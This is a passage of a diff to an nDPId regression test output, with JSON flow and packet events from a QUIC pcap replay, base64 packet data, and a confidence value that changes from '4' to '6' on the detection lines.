{"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"fonts.gstatic.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":115,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495213177,"flow_last_seen":1621495213177,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495213177,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":58832,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02303{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1621495213177,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495213177,"pkt":"AAAAAAAAAAEAguyCCABFAAViV9lAAH4RzGmokEAFdZR1HuXQAbsFTiWSzf8AAB0IA03G00cjw3oAAEU0zpEREYtHc7fujisRl6Znia+7gzai8j7ZczB+a4Fyh+TnPaUk2oSi6h8oKvmj8nm70si+eFwEDb3FGL0hKLe6Q+jl35hlotxy8iz2MJJ+5JCecVMwWZMxK7aUkr6CaJRjwV5CAn1HRTHFLENZoJSkm3TO9IVstjeamQNND1C4DAYpZCGs04m3llenDZ\/2nNSsBRAqLZzlWTAHq1v+l8D6eE3YZLIpE9IrHycGHzViWxzXMi5yEaLjXG7\/gQk6gthaWh+hPIwJXrVk91+SXWpGfGKCCJtYXQe\/YYWnkpx+6u0xCJrCQ8l49V7DgS4W5guuiYck\/qFFKjVY3epgO0wSz+88pQcwVBobJMMXob69lIlXUiGJFQRdauvWOZcO\/L\/bUlflHcZ78ul\/rMPxQOiK365X16shY0I9m9aYK0vHWaLkQuxh6V0ZNOx509fgaFleyoO82d6dXpdyjt1rJM5gsDy8odRbJsobykqUplaDy3hP2x38Y9FzMJXsgHrai1zY6jqfTltw56ae\/7dvGxvxIVqCGlfOb2WjNFBF9\/LB8quZqSRVstaohJPnGpH7kVyAxNV1GTpVzDBbsxBWsfLG+Y7\/HImytHwpfxKeW3R2CAwJZXalypABlNkFfbhaeKzeql7ba3QOrsZyGQN7oaq3Rq3MAidC50gUVpQUByaEzPovR+3MmbtY6D5hLfj4TN1QByItBrTV\/XlHoWnrq\/DHJ4ZfBK4zLh4CNky8ZPsi936i8oU3g2YuXcCw0bkg8r1WCGjKJv+rdzI5ilHttek2MA7UUHCX5ICi6MB8S0s0wZiaZIPzdp7MYwsb4SgwIeWyJ2Ljz5IdSO5DxWBGvbcD9yl+3B5kIRZEtQmYdVCNieJFQkO6Us4QcNQDENcnaYpjFm\/ja8QmX5kP93aPcbMzm7nfVngHcDxxMgMXHIvkRkcvMcFjZJTHJgMU5LFMiXkxk9yZXV+hQMvPDgQgvkvRiW99Zwppx6x\/J1jFTyAohgUibbubWRLh2AAzOHgCz2ig8L5dy9K7xCzr2Xth\/JmLkyadTNCAUj3zbID3KEBBrhe454xxmAcXntpqr8uF6By1xuvy3exW+x5KB9i1AkZNkw8L1Op43WXQvcjQxCD2resMdq+jtdzg47L\/nQ0rZyzurYJ5tT1FAT7vCsWTCaOAsiVbUmvYE1uDvAMF9dJOXuF07HLb5+xhG1XKtBDaOfchBz4SNo7+00DbN4f8EY+FxpAZKzDK9+wj+5BzVIV5iHrtH90bEmt7eAhSPZN2MjbGFeQuyxUnOzpi\/795U5CmJvNPvJeaGfSzxnjjNqBTlb+T9XJYP1XT7ItPX5ZrMBWdJ6WInKgcMnSb2gw\/ieLuFgYlaEbn3nw2Vps5tGD919b7P4tV2g20hLlqcbNlmZvviPXipf7UweSGsqmu4S0nRNTJ61wiXAEF9d+3Zvcx2Lmv6aESs4Y631voX+3P0avN1hltZJfMZHdpe6CRgj1Svw2JJxscjkxqwmbkwKldXEka+ot\/nIwrZRrkvverD8GcfNN7+gJOU8G7udQ0SKUSqI3DPyaSEb3IvIFaVDZ9Yz+HehsjvORG3zJlR2sfIgeQFPc8JjjX7ExTKf4uZOMgdLlrhCbrevhMCmiyKdBoPDkbnbi+c7aKMwm4qE+d0MtqO+rSQNHrDkMuYBESTLtHgl3RIqbnlrw9jNZIDyZG7lobW7PunDtEOt++PlNOlUQLnkW8gWBV5Vw3kQ50hMAtvSrX7RiOHr+5QxC\/dT+DEQPpku4M"} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495213177,"flow_last_seen":1621495213177,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495213177,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":58832,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"googleads.g.doubleclick.net","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495213177,"flow_last_seen":1621495213177,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495213177,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":58832,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"googleads.g.doubleclick.net","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":116,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495215529,"flow_last_seen":1621495215529,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495215529,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"38.57.8.121","src_port":58429,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02307{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1621495215529,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495215529,"pkt":"AAAAAAAAAAEAz315CABFAAViMsdAAH4RrXyokEAFJjkIeeQ9AbsFTmZNxf8AAB0IjZ\/i0MvbChYAAEU0Kuw5tIMbBep8zuXyFh\/CQw4vOa+ci4Wju1UfAkTGptA3xc23uwjbUED35IsAoT1c1vWSSpo1qoNbbUHZHartpYEZfoDzKqE0vmMKIRKBVz8p9UZnDMRqEXsN0o34IBa1u+5euUoZbZycVQbYG92X8tEJZUuLJQNPn7c9r8wIv6AfrnNfGtmki3v2aiKtRgXC1xcP0t\/BRF8i60R1e0\/SZfsdw6zmYKvXlb6meRkpRjolbih4G9oDqWoYvNI3EweYqf18S8s\/Xw6XLAvhzqAm+tqeiz6MfzwYKpLZdbP+6NSV4r3QlXmUMLI\/jOvlrh2GzjooQOG5gNIFQswRTZAMHIhQW9aX0Uhtiro\/cjYViGWEjpDbnwQi\/f7j2jafAUU5cUdCbYu6b8KUGI8MRCPg03ccQcmTOrbzbnsYFqQdZj3Oaj8oPF89fzvyu7ZZXic6q3INwPefXtAfiCceDxI7\/qwuFETUy4AU9YE7NPDCQfhrqLkBFnC7toLh5HLAWW1g0atzU1bIesqMtiWQNHpw6ilYy0P0Mml\/aLO3UASH2I3JzMRigR+aiKHJTQR\/7qGDxupagWFJiIqCs23iBup7jh85U3Fb7lC6WFTUyRRb69IuyN+9pN0xgb27sCXsGTU5vt5Xt2fpbYpKxX\/1dPfIOhbYqrmreZW09kjCedA6npXTYF2Ddu\/RWOqA5Xghl9jTCdqu6G0lVaF+jiT3YIuLbZJBefXJGeKLb1x3aZIAvordZ1rRKFBzQeFxpLpCEcohnAooS5OSu2JU2sjJcG1hFM+uZdDDe2S8bf3T5QmynqA8xZRBQc6ToAej8kU8ilRATsLphK1qTG\/Xz7HAZyaItvAVUzN6AWfe\/ptcf2FpFG2vlv3Nc0Z1o2VG2XhPHikHnP5H9GmBG4UvIGGheJm3UYfUhbFAGglGvMuSmmtTawrqACMC8ZL7+eywRfyAHmj2YOXc7igcQwM2+guxC97qeBDa6jfdMcnO1bIdOInih7VYVwp0RjaCC+xN+4sckLy91v+s6XAPniEeoaqNyxLx+zsyaYE3UO5mABu4ikw2PcrohSn8TsfYSVSIfgAf3oLeJLdeG1bAZzEHT\/leWIkPiXuKIU0JDfdwOyXbw0eJ5gIW1YwjA2PUC5WJteN3WrLf8QiM9XX\/Vnzx4CmxYhWKkYf1Lms81UyEAeHrhnSqRF4\/AUoTnEquDJImovna0QvL+UOKkZSGEQcIAHeGIN6oPpH2oVBuiKI+RIvF5od7\/HWj+KFD8j2HzDyGRrNak8i094ic3pv2Aa6Cy\/pDa+ri9GH9xvhxAT3g2LM5lW2jscCz4hr8ebvRoA6CFelcv8lyZNiluZSp4IXd3iBFb1h8XxnRIE94i5gNvCAP8AmDTshrDks9RUCJHBBxk2BRF01pWvmRN8ElDWQ00dKuNP43VwqvSZ80un7FDHwLTAiTkBxVuJmvxpNZO3IULz3xvMrJ4LFPOw4b5QWDjTvT9WZlVzi9JB\/dTancAXzz2jBSEE6cYk2wWN6hnWoimeysgkr9X+fnYznZZgkwvcmh6\/9WvRiIEio6b47a+d\/jSjLA0myTcbP51ndIrUeSm6xKHw48elW5Y4cR28w74dfEdPAhCtbHXOrPtvEYai9yvuuXjnL730N97zJThOnxmNOFbUdMaXOxLxlVUjy3ij38AxXx3a1TBJPSG++6lWuMKq5\/ce+1tui+NbZpHfRwO9L08Y5JbOLjByhgfrTXucF8VzVamDTbs+YZB0jFlVnPIVEyy9+ALSpx"} -00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495215529,"flow_last_seen":1621495215529,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495215529,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"38.57.8.121","src_port":58429,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"static.doubleclick.net","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} -00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":117,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621494599158,"flow_last_seen":1621494601272,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495215529,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":51619,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495215529,"flow_last_seen":1621495215529,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495215529,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"38.57.8.121","src_port":58429,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"static.doubleclick.net","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":117,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621494599158,"flow_last_seen":1621494601272,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495215529,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":51619,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":117,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495262761,"flow_last_seen":1621495262761,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495262761,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":55479,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02307{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1621495262761,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495262761,"pkt":"AAAAAAAAAAEAWIVLCABFAAVi\/CxAAH4RFtuokEAFcfqJ89i3AbsFTtpyxv8AAB0IHXYeW7GbkDwAAEU0cyqOvF0+zYFsDnDfj4qOegRwsK7IcQ46MH6ESOEovF69nrZGDb8lKJa9phduFdjj1k7I3mcSp4Fdox5WcOh+Uk0cZGV9fR8f0Ov6zlNHFynF0QcbyVzvpNKgfvb8FqOCsESZfnFqWIzSpjIdVFlIM3yGTD4xRjUDj1lkW0ZKllGp0aQyqCDwNkB2CqU7d1CD72aJJk6ATZ5lUmDmABhPxDZwNUEhhB0chtpF8CIMAjmAGtezZ9ouDWqW0JaiqP5zXHWUGVi+z7DqfOejMwTbhzyaKq6ngzgT0dc4966YOPgwrtJBmxim1uPIY6NQh1pHbxeKNPmo8hj2epIuOqIMeDvvwdBWt6aow69y0olkvm78WUKYVJpmQdNWK+CVp+C+UL6rmP4PjV2PigOvgJF4H38tUPzh65GKLY0ga\/03NYN\/hX0Wcjs3++ENhz4iZc9+ddaf4+4pRDlD6mkW65ATNBDIl52suxSlHN6HoynqSQY6oZvh++nCIkcG2JxZLMQ+T5nEGqj1gwsdkjle94+N9qANI7eVxlFdlntuY1+N6nk5tmMWoS\/R0WbGishHO3u6EhfykqYhHXVE59N0j+8mB5Q9+jh8ZGBt\/NKUSJCoOfZ7q1P7RZUejh0sTC65YebfomkMvboGteuZqOvQk5NXlMjaVzstVKAdT6JvVJwPuXaX88hdT72igJ3B2AlgfOI1RsIfOC7FpyGwZsX0av\/4fXJ6M0fmGATLs+LOo4iBiEQLKy0SWsPZJRQK5lZfzyxcJnxK7ZE2ACTGiwRfjEenycHidxzoFBMaR3paq4nM1XEwRUFSnVOIS589othRj472lPeD94UycNLpQ2JPV22UDBzaHVYUBpfKZcwtDascUlLDRFdo3SHiMcj7LOsEcBA5rulkUjsct5xpoNXx5B\/B2+m3KXZ00FyHamtLDjb7Po\/NZFWUfzZKuP1J\/hJm8Y99WXOElkvVgKn8xnPv5xhHavshHOttAR1+3H5+GmaPeuozfGPx1lOvgf97f4mVbgfunDuvEFxroS6I721gl6SvWtXHjyFJgJ0rIse8i6rRMQEoqSyvpxXclyfXHJ\/psvDdCdjhdvfvawUeb8D4u\/YZgul2vd1LWGMVgejI3sOxrePT+0ro1TsD+i0FH5MXZ8HvKJqB\/TAP3NBVUsk4YNndeX3dsYusAsf3qVTja16TeR5sSx\/+z+wRVz0lq7+OCWGxB8fNRGzmbAenuE9pS\/k2Ghc4RQd15aI2tGcDl7Yc7AtkS9GD1efiAgnbw\/ROL6uZMSwnSghBH++dvDhhHzVcSwVinWhVZeyH9xqIAn\/kFmpDD9BO5Dxi3TuuZgOY\/344mR5RfwsNXXiMndFoP9P9LnMgWMYN5fr9gxkoFqo96s9ZpovfzjCbESzAw1U1OTZa7Lw4eJBkreLeO8mAYYE+LTsjfFVvC6rsliMl92joXcb85RkQrnTc4eatNXHuuYwvm\/Dr6O+7Ki2lIM4KcPnOCaF82c+PeLXbukzNmSEE3xvbz8wD0oxVX6eIeHO46TvhNZLEqAkuH1Fk8o2uNjEO5NN\/4T6X9Vx\/U7um8EnKZhp\/2mSs8gyRdalK6y\/u3KgU\/B7rnXkAB8DpUU3+R\/57bheJygo7zgvAvl0Dq3GraOVbrzJOvE85qkvo2AcnP0BV6NyqQmSYY0qcb0HX5twA+m3yMctUDJ6LSc5yUQvOXJncRh308497vAxONTdvp9+L4KLUhVLOh0L+x+RbMxsPkaaIn6POFyWoSrw0UDO8jroi049O"} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495262761,"flow_last_seen":1621495262761,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495262761,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":55479,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495262761,"flow_last_seen":1621495262761,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495262761,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":55479,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":118,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495274945,"flow_last_seen":1621495274945,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495274945,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":60934,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02311{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1621495274945,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495274945,"pkt":"AAAAAAAAAAEAIHu5CABFAAViFcFAAH4RYDuokEAFgPgYAe4GAbsFToSxy\/8AAB0Ifg25e8dGmIEAAEU0NqVCEso1JyDnNa3XDGKdMJ5pTtV4nHofZAOnT1W+icJE5UY0TxDpCncREJLRH\/MPp7gaAubIBfy0WALhYVrmN\/h663kyTLy3uhofsu0TFEUnEWA+7HI+9JmK++aEmLEdeW6aDw9AD7oHPVlHJCcNoL6DRjUXNW6UwhifFO\/SGjrLRnHDVvcCbj383i203PYQCpsw1TTQLBNjWKjDQrTtIXrNx4V3oD1ei\/pnb3fnosV0RqaaT5EdA\/kbj3Qunb\/sj0TkZt219kbzZOuQOBwN97ZcgkkMco25yPaA5EE6pEJVtcYRhFHMV56RBuHnwBmJlpzat7EiWvBo17\/ZB4IV0XDC1EnRW7hVi1JGuDqv9wZh2naSmQwKBXisH1o8XxVgnKQThxyfXjf51QhQEpwyOBsPYA3sE80VUeUeF8YLmKJTmzCfKKen33pI74rSdatEVK\/riZ+k6Nx5Kv9ipxPveh\/OIKxrzg8fgwo6AtFiL7zpCKxJqETtW0Xa1iFaOYl7Z94ySPI0GrURbdOh17EWunCEGOaxFh5r1hyG20LK9uvCozSsHKRFAEEt8MTzWmZpHhUXoL4EBByiqvMPoD\/japbNeuqz+NZjcIAzLd5J7FIuRz17WAcrSLxduUWgAyBLIUVUSdw8wWeTbHOqa\/\/igt66GxhOxwnJA5q2ICcxEMzAYQknRdL5EwIR5G9hyMyaMEPKFuOhlR5K87PPV1OV5HTKBWuuQYcTSS2eMTcfL+LwS5zCy0DYr9XLJSQUeYXIgqrKv\/AHsPiF9PATspeWFZmZlm5GhZRglJ\/XKQG9XUxzfhDhP7y6m5R5\/xhVN6r91dLobOj3Hr6xnIg91wuWL0hkq29euOXZEAmYABS2BlN1JqxVxLeS1gYwKu8ZXJt94wPKz57Z6Ujs9YFRokZxZZDrRK8PX7BCPLDmcPiN5sNo15756ioaNcl4AX4v0EDRvDj3vYMKyFtQk58BOP\/uvTqrr6VjolIemKnqeJ\/sLePz3jY4p3NKgfKlmuliP81+pLj33EztpDUD3jYbL+MxSlNzeEnBCL7fOUVNAt\/9QxLRubiaTnxA0KR3eUjeh2rkb9KibkuXgAjUnvVEkK8aTr4Rjx98mH3whwCOTSwaDUKhnghn7bTjoDbh7vaeGMq9kSnvTDYXLIXgXgxvzNNlytJRA+bygeEgrquKFCSVVMG8J90v4BnHeAlvc4DYHIx2qJUsM8Lon6vK0e+65TgpTZKgASs0YbzDsVlALTwsNmrzZ9Z58wPBg9nT0ApUWY+Bvw20yzKGeOF5612Kox\/Kgw9M\/S4tLsnL4GEyFvrXltx2UtehZ+rnmLj2SsFbXxyq4ELJqWAjXNYab2bIqTsuwJ23bC\/hV\/lb65I48n7iyde1m67ozjQ5jCDaDVbnKLpriZVB6HPOjVFDe\/50gs0o2kVKPKEL+M24zTzWjn+gbaBdA9Y368TDtVgDjhk+0PWGeyRoCBcFbrGp3fBEtCJrqca3oiS4PMmd2dDVIxkr1nY+QSvCz7lxP9o7YB9OLPDxQmFWKlzHaowYyGDhQ4sUFdFiViXFRffQBO4GUEIqLifq0nd\/NakpsrzU0RqS5YG6uNuPjih1z5buPD7ehrJADajo5Dk+\/f+3lQNTFDfdZ3dd2xeZDkmq80JGAEpHPxGqurIijXd+lbTozqxxqwjhTNnVo2dxefRWbTd03ai6b\/hGokXWjfwn5SLA1W2FheoTwlBMf8\/nG5VrvvfTQYrAQiW0QQNyW1fjr5XCEJZ80G9Ts2SO"} -00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":118,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495274945,"flow_last_seen":1621495274945,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495274945,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":60934,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons.gcp.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":118,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495274945,"flow_last_seen":1621495274945,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495274945,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":60934,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons.gcp.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495335381,"flow_last_seen":1621495335381,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495335381,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":59785,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 